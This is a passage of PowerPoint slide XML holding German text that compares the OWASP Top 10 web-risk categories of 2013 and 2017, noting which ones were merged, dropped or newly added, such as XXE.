                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> &amp; Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, das zum Übersehen oder zu beträchtlichen Verzögerungen beim</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Erkennen von bösartigen Aktivitäten oder digitalen Einbrüchen und dem Bearbeiten der Sicherheitsvorfälle sowie der digitalen Forensik führen kann.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="0" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="500"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Zusammengeführt </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>oder aus den Top 10 ausgeschieden, jedoch nicht vergessen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="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de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4-Unsichere direkte Objektreferenzen </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>und </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7-Fehlerhafte Autorisierung auf Anwendungsebene </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>zusammen-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>geführt (=vereint) zu </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017-Fehler in der Zugriffskontrolle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="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de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Request </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Forgery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (CSRF)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> da viele Frameworks Maßnahmen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> gegen </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> beinhalten, wurde diese</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Kategorie nur noch in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5% der Anwendungen gefunden.</a:t>
                      </a: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de-DE" sz="900" b="1"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A10-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ungeprüfte Um- und Weiterleitungen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, das noch in ca. 8% der Anwendungen auftrat, wurde insbes. durch XXE verdrängt.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" noProof="0" dirty="0">
                        <a:latin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3" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2171677055"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6199200"/>
          <a:ext cx="6854400" cy="3717644"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{17292A2E-F333-43FB-9621-5CBBE7FDCDCB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3245397">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="334123">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3274880">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" noProof="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de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" noProof="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2013</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1600" b="1" noProof="0"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baseline="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800" b="1" baseline="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 2017</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solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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950" b="1" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" noProof="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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950" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1:2017-Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" noProof="0"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950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A2 – Fehler in Authentifizierung und Session-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Mgmt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="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950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A2:2017-Fehler in der Authentifizierung</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="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950" b="1" kern="1200" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3 – Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="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950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3:2017-Verlust der Vertraulichkeit sensibler Daten</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="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950" b="1" kern="1200" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4 – Unsichere direkte Objektreferenzen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[mit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> A7]</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542"/>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1800" b="1" kern="120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950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>External</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Entities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> [NEU]</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B"/>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4"/>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950" b="1" kern="1200" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A5 – Sicherheitsrelevante Fehlkonfiguration</a:t>
                      </a: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950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A5:2017-Fehler in der Zugriffskontrolle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[vereint]</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B"/>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5"/>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950" b="1" kern="1200" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6 – Verlust der Vertraulichkeit sensibler Daten</a:t>
                      </a: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950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017-Sicherheitsrelevante</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Fehlkonfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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6"/>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950" b="1" kern="1200" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Fehlerhafte Autorisierung auf </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Anw</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" kern="1200" noProof="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.-Ebene </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
